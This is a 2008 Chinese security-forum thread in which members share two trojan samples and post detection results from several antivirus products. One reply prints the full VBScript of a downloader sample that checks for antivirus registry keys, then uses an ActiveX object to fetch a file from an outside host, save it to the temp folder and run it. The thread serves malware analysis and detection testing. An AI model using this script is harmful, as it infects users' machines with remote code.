来~~来，小马2只~~~

显示全部楼层 · 发表于 2008-6-21 18:54:42

来~~来，小马2只~~~
来~~来，小马2只~~~一只费尔爆，另一个不爆！

显示全部楼层 · 发表于 2008-6-21 18:59:16

3610429  count[1].gif  2.47 KB  MALWARE
25054053  ####.txt  50 Byte  UNDER ANALYSIS
25054054  yy67890yy.exe  208.73 KB  UNDER ANALYSIS

显示全部楼层 · 发表于 2008-6-21 19:04:29

卡巴杀完

已删除：木马程序 Trojan-Downloader.VBS.Psyme.pq 文件　: D:\软件\其它\v\k\样本.rar/count[1].rar/count[1].gif
已删除：木马程序 Trojan-Downloader.Win32.Delf.fam 文件　: D:\软件\其它\v\k\样本.rar/yy67890yy.zip/yy67890yy.exe//PE_Patch//TeLock

显示全部楼层 · 发表于 2008-6-21 19:34:23

On error resume Next X1="http://ad.65862.com/real.gif" Set X2=document.createElement("obj"&"ect") X2.setAttribute "classid","clsid:B"&"D9"&"6C556-65A3-11D0-983A-00C04FC29E36" Set X17=X2.createobject("WScript.Shell","") X18=X17.RegRead("HKLM\SOFTWARE\adx\Config\Time1") X18=X18&X17.RegRead("HKLM\SOFTWARE\real\Config\Time1") X18=X18&X17.RegRead("HKLM\SOFTWARE\rising\Rav\") X18=X18&X17.RegRead("HKCU\SOFTWARE\Rising\KaKaToolBar\name") X18=X18&X17.RegRead("HKLM\SOFTWARE\360safe\Coop\PrePartner") X18=X18&X17.RegRead("HKCU\SOFTWARE\Kingsoft\AntiVirus\InstallTime") X18=X18&X17.RegRead("HKLM\SOFTWARE\KasperskyLab\AVP6\environment\ProductName") If X18="" Then X3="M"&"icr"&"osoft.X"&"MLH"&"TTP" Set X4=X2.CreateObject(X3,"") X5="Ado" X6="db." X7="Str" X8="eam" X9=X5&X6&X7&X8 X10=X9 set X11=X2.createobject(X10,"") X11.type=1 X12="GET" X4.Open X12,X1,False X4.Send X13="X"&CStr(Int((9999-1000+1)*Rnd+1000))&".com" set X14=X2.createobject("S"&"cri"&"pting.F"&"ileSy"&"stemObject","") set X15=X14.GetSpecialFolder(2) X13=X14.BuildPath(X15,X13) X11.open X11.write X4.responseBody X11.savetofile X13,2 X11.close Set X16 = X2.createobject("WScript.Shell","") X16.run(X13) End If

[ 本帖最后由 granthill 于 2008-6-21 19:41 编辑 ]

显示全部楼层 · 发表于 2008-6-21 19:37:21

小红伞1个

显示全部楼层 · 发表于 2008-6-21 19:37:47

:\virus\count[1].rar:\count[1].gif - 特征码 'VBS.Downloader.Boran.I' 被发现
D:\virus\count[1].rar
D:\virus\yy67890yy.zip:\注意.txt
D:\virus\yy67890yy.zip:\yy67890yy.exe - 特征码 'Trojan-Downloader.Win32.Banload.auf' 被发现
D:\virus\yy67890yy.zip

5 文件被扫描
(2 压缩档 3 文件)
2 特征码被侦测
0 可疑代码段被发现
耗时: 0:00.203

显示全部楼层 · 发表于 2008-6-21 19:38:19

金山2个

显示全部楼层 · 发表于 2008-6-21 19:39:47

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Trojan.DL.Win32.Delf.zay

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.49.52

显示全部楼层 · 发表于 2008-6-21 19:49:24

大蜘蛛1个

显示全部楼层 · 发表于 2008-6-21 20:56:59

Begin scan in 'C:\Documents and Settings\haha\桌面\real.rar'
C:\Documents and Settings\haha\桌面\real.rar
  [0] Archive type: RAR
  --> real.gif
   [DETECTION] Contains detection pattern of the Ad- or Spyware ADSPY/Drop.Boran.I
   [NOTE]    A backup was created as '48bdfae6.qua'  ( QUARANTINE )

[病毒样本] 来来，小马2只~

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

7/1

本帖子中包含更多资源

[病毒样本] 来~~来，小马2只~~~

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

7/1

本帖子中包含更多资源

[病毒样本] 来来，小马2只~